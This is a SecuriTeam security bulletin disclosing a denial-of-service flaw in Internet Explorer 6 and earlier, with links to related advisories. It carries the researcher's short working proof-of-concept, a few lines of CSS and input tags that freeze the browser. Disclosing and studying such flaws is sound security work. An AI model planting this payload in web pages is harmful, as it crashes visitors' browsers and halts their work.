[EXPL] Internet Explorer input DoS (Exploit)

- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.

- - - - - - - - -

Internet Explorer input DoS (Exploit)

SUMMARY

Improper handling of input field allows attackers to DoS Microsoft
Internet Explorer.

DETAILS

Exploit:
<!--
# Internet Explorer <= 6 DoS vulnerability
#
# tested IE6 on XPx64 and IE 5.1, 5.5 and 6 on XP SP2 (eng)
# all versions are vulnerable
# ie 7 (beta 2 and 3) are not affected
#
# this malicious css code freezes/ dos the internet explorer
# prior version 7 and stops any user interaction
# the absolute size of the div element does not matter but has
# to be higher than the input's one
#
# 07/14/2006 by jonasschaub at gmail.com
# http://jonas.elunic.de/blog/index.php/2006/07/14/ie-freeze-bug/
#
-->

input
{
width:35px;
float:left;
}

<input />
<input />
<input />

ADDITIONAL INFORMATION

The information has been provided by <mailto:jonasschaub@xxxxxxxxx> Jona
Sschaub.
The original article can be found at:
<http://jonas.elunic.de/blog/index.php/2006/07/14/ie-freeze-bug/>
http://jonas.elunic.de/blog/index.php/2006/07/14/ie-freeze-bug/

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NT] BlueCoat WinProxy Multiple DoS and Buffer Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... BlueCoat WinProxy Multiple DoS and Buffer Overflow ... Improper handling of long requests within BlueCoat WinProxy ... 10/12/2005 Initial vendor notification about HTTP Remote DoS ...
    (Securiteam)
  • [NT] Internet Explorer Handling of %20 Allows Spoofing
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Internet Explorer supports two forms of URI (Universal Resource ... It is looking for 16 charachters and ignores anything after the %20 ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] Microsoft Internet Explorer and mshtml.dll Nested OBJECT Tag DoS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Internet Explorer and mshtml.dll Nested OBJECT Tag DoS ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] Internet Explorer CSS Attribute DoS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Improper handling of CSS allows attackers to crash Internet Explorer. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [NT] MSWebDVD Class (mswebdvd.dll) Null Pointer Assignment
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Internet Explorer can be crashed remotely ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)